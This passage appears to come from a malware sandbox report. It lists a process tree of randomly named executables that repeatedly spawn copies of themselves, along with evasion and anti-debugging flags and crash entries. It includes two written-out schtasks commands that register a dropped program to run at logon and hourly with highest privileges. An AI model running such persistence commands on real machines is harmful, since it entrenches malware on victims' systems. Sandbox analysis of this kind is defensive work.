    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:22044
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:20992
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:22096
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:22764
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:22600
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:23656
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:23384
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:23424
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:24728
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:24500
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:24448
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:23580
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:21052
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19028
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:25584
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:26204
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14804
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:25692
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:26088
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12636
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:2844
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27100
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27632
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27156
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27568
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27072
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:26828
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:5552
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28160
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:20068
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28188
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27744
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28336
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:29464
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28944
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:29072
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27100
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28924
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28324
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12088
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:28680
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18600
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:29400
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:22584
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27176
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:24756
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:21836
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:29928
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19016
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31068
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31448
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:30740
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31316
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31700
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31480
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27424
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:29888
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27948
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:27776
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4732
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:3836
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:30288
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8108
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31676
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:21488
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7396
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4856
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:29812
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31880
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10792
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:30332
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:31208
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:30148
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:22040
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4112
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:30296
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:24024
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:1624
- C:\Users\Admin\Documents\JJ6AumaYFEtBFm5kSui0CVst.exe
  "C:\Users\Admin\Documents\JJ6AumaYFEtBFm5kSui0CVst.exe"
  2⤵
  - Executes dropped EXE
  PID:1864
- C:\Users\Admin\Documents\8xY2MwIEswiXUM0RxIbLQCNT.exe
  "C:\Users\Admin\Documents\8xY2MwIEswiXUM0RxIbLQCNT.exe"
  2⤵
  - Executes dropped EXE
  PID:2836
- - C:\Users\Admin\Documents\8xY2MwIEswiXUM0RxIbLQCNT.exe
    "C:\Users\Admin\Documents\8xY2MwIEswiXUM0RxIbLQCNT.exe"
    3⤵
    PID:7796
- - C:\Users\Admin\Documents\8xY2MwIEswiXUM0RxIbLQCNT.exe
    "C:\Users\Admin\Documents\8xY2MwIEswiXUM0RxIbLQCNT.exe"
    3⤵
    PID:7836
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7836 -s 1536
      4⤵
      Program crash
      PID:7916
- C:\Users\Admin\Documents\ON4L5bHszVasHkwSax9rAiBb.exe
  "C:\Users\Admin\Documents\ON4L5bHszVasHkwSax9rAiBb.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Users\Admin\Documents\TLKGjjbMHL93Djbs7Er7dETi.exe
  "C:\Users\Admin\Documents\TLKGjjbMHL93Djbs7Er7dETi.exe"
  2⤵
  PID:4044
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3068
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3708
- C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
  "C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3276
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    PID:4744
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    PID:5108
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    PID:2872
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    PID:2892
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    PID:5532
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    PID:6128
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6020
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:1856
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4044
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5492
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 24
      4⤵
      Program crash
      PID:6692
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6460
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6608
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6324
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:7540
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:1204
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8080
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8128
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5016
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 24
      4⤵
      Program crash
      PID:8108
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:7924
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:4208
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:4324
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 24
      4⤵
      Program crash
      PID:8700
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8564
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9060
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8464
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6720
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8348
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9092
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9544
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:10128
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8416
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9116
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9992
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:10524
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11052
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9864
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:10348
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9100
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:4260
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11920
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11272
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11548
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11744
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11020
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:1244
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11672
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12392
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12888
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:968
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12584
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12572
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11420
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:13064
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5784
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:13380
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:13756
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:14264
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:13684
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:14092
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
